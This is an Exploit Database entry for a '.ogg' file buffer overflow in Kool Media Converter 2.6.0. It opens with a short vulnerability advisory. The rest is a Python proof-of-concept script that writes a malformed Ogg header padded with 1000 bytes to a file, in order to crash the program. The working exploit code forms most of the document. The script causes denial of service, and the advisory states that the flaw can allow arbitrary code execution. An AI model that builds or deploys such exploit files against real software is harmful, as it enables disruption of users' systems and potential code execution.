Kool Media Converter 2.6.0 – ‘.ogg’ File Buffer Overflow

• Exploit Database
• 17 阅读

• 作者： swami
  日期： 2011-11-11
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/36300/

• source: https://www.securityfocus.com/bid/50651/info
  
  Kool Media Converter is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
  
  Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
  
  Kool Media Converter 2.6.0 is vulnerable; other versions may also be affected. 
  
  #!/usr/bin/env python
  #
  #
  # Exploit Title: Kool Media Converter v2.6.0 DOS
  # Date: 10/10/2011
  # Author: swami
  # E-Mail: flavio[dot]baldassi[at]gmail[dot]com
  # Software Link: http://www.bestwebsharing.com/downloads/kool-media-converter-setup.exe
  # Version: 2.6.0
  # Tested on: Windows XP SP3 ENG
  #
  #--- From Vendor Website
  # Kool Media Converter is a sound tool addressed to casual listeners and fervent 
  # audiophiles likewise. It deals with compatibility problems between your audio files 
  # and the media player you are using to help you enjoy all the songs you love anyway you like.
  #
  #--- Description
  # Kool Media Converter fails to handle a malformed .ogg file
  
  ogg = b'\x4F\x67\x67\x53'		# Capture Pattern OggS in ascii
  ogg += b'\x00'				# Version currently 0
  ogg += b'\x02'		 		# Header Type of page that follows
  ogg += b'\x00' * 8			# Granule Position
  ogg += b'\xCE\xc6\x41\x49'		# Bitstream Serial Number
  ogg += b'\x00' * 4 			# Page Sequence Number
  ogg += b'\x70\x79\xf3\x3d'	 	# Checksum
  ogg += b'\x01'		 		# Page Segment max 255
  ogg += b'\x1e\x01\x76\x6f'		# Segment Table
  
  ogg += b'\x41' * 1000
  
  try:
  	f = open('koolPoC.ogg','wb')
  	f.write(ogg)
  	f.close()
  except:
  	print('\nError while creating ogg file\n')